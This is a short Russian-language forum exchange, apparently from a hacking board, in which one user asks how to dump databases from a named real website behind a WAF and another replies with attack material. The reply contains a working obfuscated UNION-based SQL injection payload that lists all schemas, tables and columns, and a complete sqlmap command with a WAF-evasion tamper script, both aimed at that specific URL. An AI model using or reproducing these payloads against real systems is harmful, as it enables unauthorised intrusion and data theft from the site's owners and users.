Помогите , я так понял здесь waf , sqlmap видит уязвимость , но не выводит базы , а ручками не умею ( http://www.mtes.ir/portfolio/portfolio.php?id=66 Подскажите , как быть .
На случай если решить руками: Code: id=66'+and+0+/*!00000union*/select+1,2,3,(select(@n)from(select(@n:=0x20),(select(null)from(information_schema.columns)where(0x2b)in(@n:=concat/**/(@n,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))and(table_schema!=0x696e666f726d6174696f6e5f736368656d61)))n),5,6,7,8,9,0--+- Или хочешь засрать логи: Code: sqlmap.py --url=http://www.mtes.ir/portfolio/portfolio.php?id=66 --no-cast --banner --dbms=MySQL --tamper=modsecurityversioned --risk 3 --level 3 --technique=U --union-cols=10 --union-char=1337
